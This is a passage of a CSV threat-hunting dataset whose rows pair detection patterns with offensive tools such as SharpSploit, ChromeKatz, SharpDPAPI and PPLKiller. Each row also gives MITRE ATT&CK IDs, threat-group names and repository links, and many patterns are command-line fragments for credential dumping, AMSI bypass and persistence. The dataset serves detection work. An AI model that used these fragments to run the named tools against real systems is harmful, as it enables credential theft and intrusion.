"*.Credentials.Mimikatz.*",".{0,1000}\.Credentials\.Mimikatz\..{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/cobbr/SharpSploit","1","0","N/A","N/A","10","10","1789","312","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z","4280" "*.Credentials.Tokens.BypassUAC*",".{0,1000}\.Credentials\.Tokens\.BypassUAC.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/cobbr/SharpSploit","1","0","N/A","N/A","10","10","1789","312","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z","4281" "*.DCSync(System.String*",".{0,1000}\.DCSync\(System\.String.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/cobbr/SharpSploit","1","0","N/A","N/A","10","10","1789","312","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z","4283" "*.dev.123456.*",".{0,1000}\.dev\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of 
flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","N/A","10","10","444","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z","4284" "*.DLL injection complete!*",".{0,1000}\.DLL\sinjection\scomplete!.{0,1000}","offensive_tool_keyword","NetRipper","NetRipper - Smart traffic sniffing for penetration testers","T1173 - T1557 - T1573.001 - T1056.001","TA0009 - TA0010","N/A","N/A","Sniffing & 
Spoofing","https://github.com/NytroRST/NetRipper","1","0","N/A","N/A","10","10","1368","318","2022-06-17T21:08:54Z","2015-07-14T20:31:04Z","4286" "*.dmp 1> \\127.0.0.1\C$\*",".{0,1000}\.dmp\s1\>\s\\\\127\.0\.0\.1\\C\$\\.{0,1000}","offensive_tool_keyword","spraykatz","Spraykatz is a tool without any pretension able to retrieve credentials on Windows machines and large Active Directory environments.","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008","TA0003 - TA0004 - TA0007","N/A","N/A","Credential Access","https://github.com/aas-n/spraykatz","1","0","N/A","N/A","9","8","763","121","2020-06-20T12:14:00Z","2019-09-09T14:38:28Z","4287" "*.dns2tcpdrc*",".{0,1000}\.dns2tcpdrc.{0,1000}","offensive_tool_keyword","dns2tcp","Dns2tcp is a tool for relaying TCP connections over DNS","T1071.004 - T1048.003","TA0011 - TA0001","N/A","N/A","C2","https://github.com/alex-sector/dns2tcp","1","0","N/A","N/A","10","10","191","60","2024-06-08T09:40:52Z","2017-11-23T11:19:53Z","4288" "*.doc.bat*",".{0,1000}\.doc\.bat.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4290" "*.doc.dll*",".{0,1000}\.doc\.dll.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4291" "*.doc.exe*",".{0,1000}\.doc\.exe.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4292" "*.doc.htm*",".{0,1000}\.doc\.htm.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - 
TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4293" "*.doc.iso*",".{0,1000}\.doc\.iso.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4294" "*.doc.jar*",".{0,1000}\.doc\.jar.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4295" "*.doc.js*",".{0,1000}\.doc\.js.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4296" "*.doc.sfx*",".{0,1000}\.doc\.sfx.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4297" "*.doc.vbs*",".{0,1000}\.doc\.vbs.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4298" "*.docx.bat*",".{0,1000}\.docx\.bat.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4299" "*.docx.exe*",".{0,1000}\.docx\.exe.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4300" 
"*.docx.htm*",".{0,1000}\.docx\.htm.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4301" "*.docx.iso*",".{0,1000}\.docx\.iso.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4302" "*.docx.jar*",".{0,1000}\.docx\.jar.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4303" "*.docx.jasmin*",".{0,1000}\.docx\.jasmin.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","N/A","N/A","10","3","252","80","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z","4304" "*.docx.js*",".{0,1000}\.docx\.js.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4305" "*.docx.sfx*",".{0,1000}\.docx\.sfx.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4306" "*.docx.vbs*",".{0,1000}\.docx\.vbs.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4307" 
"*.edx765txt*",".{0,1000}\.edx765txt.{0,1000}","offensive_tool_keyword","LummaC2-Stealer-sample","artifacts from a specific sample of lumma stealer - source code on github","T1204.002 - T1566.001 - T1059.003 - T1027 - T1140 - T1555.003 - T1557.001 - T1083 - T1560.001 - T1041 - T1567 - T1071.001 - T1105 - T1539","TA0006 - TA0010","Lumma Stealer","N/A","Credential Access","https://github.com/x86byte/LummaC2-Stealer","1","0","#content","can be used for yara scans","10","1","31","5","2025-02-18T00:38:59Z","2025-02-15T12:28:05Z","4308" "*.Enumeration.Domain.Credential*",".{0,1000}\.Enumeration\.Domain\.Credential.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/cobbr/SharpSploit","1","0","N/A","N/A","10","10","1789","312","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z","4309" "*.Enumeration.Domain.SPNTicket*",".{0,1000}\.Enumeration\.Domain\.SPNTicket.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/cobbr/SharpSploit","1","0","N/A","N/A","10","10","1789","312","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z","4310" "*.Enumeration.Keylogger*",".{0,1000}\.Enumeration\.Keylogger.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and 
make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/cobbr/SharpSploit","1","0","N/A","N/A","10","10","1789","312","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z","4311" "*.Enumeration.Keylogger.*",".{0,1000}\.Enumeration\.Keylogger\..{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/cobbr/SharpSploit","1","0","N/A","N/A","10","10","1789","312","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z","4312" "*.Enumeration.Network.PortScanResult*",".{0,1000}\.Enumeration\.Network\.PortScanResult.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/cobbr/SharpSploit","1","0","N/A","N/A","10","10","1789","312","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z","4313" "*.Enumeration.Registry.GetRegistryKey(*",".{0,1000}\.Enumeration\.Registry\.GetRegistryKey\(.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 
- T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/cobbr/SharpSploit","1","0","N/A","N/A","10","10","1789","312","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z","4314" "*.Enumeration.Registry.SetRegistryKey(*",".{0,1000}\.Enumeration\.Registry\.SetRegistryKey\(.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/cobbr/SharpSploit","1","0","N/A","N/A","10","10","1789","312","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z","4315" "*.events.123456.*",".{0,1000}\.events\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - 
Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","N/A","10","10","444","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z","4316" "*.exe /HistorySource 1 /SaveDirect /scomma *",".{0,1000}\.exe\s\s\/HistorySource\s1\s\/SaveDirect\s\/scomma\s.{0,1000}","offensive_tool_keyword","BrowsingHistoryView","BrowsingHistoryView is a utility that reads the history data of different Web browsers","T1217 - T1070 - T1113","TA0009 - TA0005 - TA0007","N/A","GOBLIN PANDA","Discovery","https://www.nirsoft.net/utils/browsing_history_view.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4317" "*.exe /logonpasswords /symbol*",".{0,1000}\.exe\s\s\/logonpasswords\s\/symbol.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","4318" "*.exe --b64 --path * --args ",".{0,1000}\.exe\s\s\-\-b64\s\-\-path\s.{0,1000}\s\-\-args\s","offensive_tool_keyword","NetLoader","Loads any C# binary in memory - patching AMSI + ETW","T1055.012 - T1112 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense 
Evasion","https://github.com/Flangvik/NetLoader","1","0","N/A","N/A","10","9","820","147","2021-10-03T16:41:03Z","2020-05-05T15:20:16Z","4319" "*.exe --buildcache -c *\cache.txt*",".{0,1000}\.exe\s\s\-\-buildcache\s\-c\s.{0,1000}\\cache\.txt.{0,1000}","offensive_tool_keyword","SOAPHound","enumerate Active Directory environments via the Active Directory Web Services (ADWS)","T1018 - T1087.002 - T1649","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/FalconForceTeam/SOAPHound","1","0","N/A","N/A","8","8","736","76","2024-02-03T08:52:49Z","2024-01-25T09:11:12Z","4320" "*.exe certificates /pvk:*.pvk*",".{0,1000}\.exe\s\scertificates\s\/pvk\:.{0,1000}\.pvk.{0,1000}","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112 - T1649","TA0006 - TA0002","N/A","Conti","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","N/A","10","10","1232","215","2024-06-27T13:39:08Z","2018-08-22T17:39:31Z","4321" "*.exe -group=remote -computername=*",".{0,1000}\.exe\s\s\-group\=remote\s\-computername\=.{0,1000}","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. 
and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","Dispossessor","Persistence","https://github.com/GhostPack/Seatbelt","1","0","N/A","fp risks","10","10","4047","722","2025-01-10T20:12:49Z","2018-07-24T17:38:51Z","4322" "*.exe keepass /unprotect*",".{0,1000}\.exe\s\skeepass\s\/unprotect.{0,1000}","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112 - T1649","TA0006 - TA0002","N/A","Conti","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","N/A","10","10","1232","215","2024-06-27T13:39:08Z","2018-08-22T17:39:31Z","4323" "*.exe -lolbas log*",".{0,1000}\.exe\s\s\-lolbas\slog.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","0","N/A","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","4324" "*.exe * -eventlog *Key Management Service*",".{0,1000}\.exe\s.{0,1000}\s\-eventlog\s.{0,1000}Key\sManagement\sService.{0,1000}","offensive_tool_keyword","cobaltstrike","Persistence by writing/reading shellcode from Event Log","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 
- T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/improsec/SharpEventPersist","1","0","N/A","N/A","10","10","371","50","2022-05-27T14:52:02Z","2022-05-20T14:52:56Z","4326" "*.exe * --source Persistence*",".{0,1000}\.exe\s.{0,1000}\s\-\-source\sPersistence.{0,1000}","offensive_tool_keyword","cobaltstrike","Persistence by writing/reading shellcode from Event Log","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - 
TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/improsec/SharpEventPersist","1","0","N/A","N/A","10","10","371","50","2022-05-27T14:52:02Z","2022-05-20T14:52:56Z","4327" "*.exe *.bin -enc aes -lang csharp*",".{0,1000}\.exe\s.{0,1000}\.bin\s\-enc\saes\s\-lang\scsharp.{0,1000}","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation tool","https://github.com/nickvourd/Supernova","1","0","N/A","N/A","10","9","829","151","2025-04-18T19:15:22Z","2023-08-08T11:30:34Z","4328" "*.exe *-searchforest*-pwdlastset*",".{0,1000}\.exe\s.{0,1000}\-searchforest.{0,1000}\-pwdlastset.{0,1000}","offensive_tool_keyword","Get-RBCD-Threaded","Tool to discover Resource-Based Constrained Delegation attack paths in Active Directory Environments","T1558 - T1208 - T1550 - T1484 - T1486","TA0007 - TA0008","N/A","N/A","Exploitation tool","https://github.com/FatRodzianko/Get-RBCD-Threaded","1","0","N/A","N/A","N/A","2","121","19","2021-08-10T23:29:48Z","2019-12-21T00:08:28Z","4329" "*.exe .\chrome.DMP*",".{0,1000}\.exe\s\.\\chrome\.DMP.{0,1000}","offensive_tool_keyword","ChromeKatz","Dump cookies directly from Chrome process memory","T1555.003 - T1003","TA0006 - TA0009","N/A","N/A","Credential 
Access","https://github.com/Meckazin/ChromeKatz","1","0","N/A","N/A","10","10","1171","115","2024-11-26T12:53:22Z","2023-12-07T22:27:06Z","4330" "*.exe .\msedge.DMP*",".{0,1000}\.exe\s\.\\msedge\.DMP.{0,1000}","offensive_tool_keyword","ChromeKatz","Dump cookies directly from Chrome process memory","T1555.003 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Meckazin/ChromeKatz","1","0","N/A","N/A","10","10","1171","115","2024-11-26T12:53:22Z","2023-12-07T22:27:06Z","4331" "*.exe /disableLSAProtection*",".{0,1000}\.exe\s\/disableLSAProtection.{0,1000}","offensive_tool_keyword","PPLKiller","Tool to bypass LSA Protection (aka Protected Process Light)","T1547.002 - T1558.003","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RedCursorSecurityConsulting/PPLKiller","1","0","N/A","N/A","10","10","933","139","2022-12-04T23:38:31Z","2020-07-06T10:11:49Z","4332" "*.exe /gethmac /mode:SHA1 /key:*",".{0,1000}\.exe\s\/gethmac\s\/mode\:SHA1\s\/key\:.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","4333" "*.exe /HistorySource 1 /LoadChrome 1 /shtml *",".{0,1000}\.exe\s\/HistorySource\s1\s\/LoadChrome\s1\s\/shtml\s.{0,1000}","offensive_tool_keyword","BrowsingHistoryView","BrowsingHistoryView is a utility that reads the history data of different Web browsers","T1217 - T1070 - T1113","TA0009 - TA0005 - TA0007","N/A","GOBLIN PANDA","Discovery","https://www.nirsoft.net/utils/browsing_history_view.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4335" "*.exe /method:create 
/taskname:*",".{0,1000}\.exe\s\/method\:create\s\/taskname\:.{0,1000}","offensive_tool_keyword","ScheduleRunner","A C# tool with more flexibility to customize scheduled task for both persistence and Lateral Movement in red team operation","T1210 - T1570 - T1021 - T1550","TA0008","N/A","N/A","Persistence","https://github.com/netero1010/ScheduleRunner","1","0","N/A","N/A","9","4","336","46","2025-01-22T02:06:59Z","2021-10-12T15:27:32Z","4340" "*.exe /method:create /taskname:* /trigger:* /modifier:* /program:* /argument:*.dll /remoteserver:*",".{0,1000}\.exe\s\/method\:create\s\/taskname\:.{0,1000}\s\/trigger\:.{0,1000}\s\/modifier\:.{0,1000}\s\/program\:.{0,1000}\s\/argument\:.{0,1000}\.dll\s\/remoteserver\:.{0,1000}","offensive_tool_keyword","ScheduleRunner","A C# tool with more flexibility to customize scheduled task for both persistence and Lateral Movement in red team 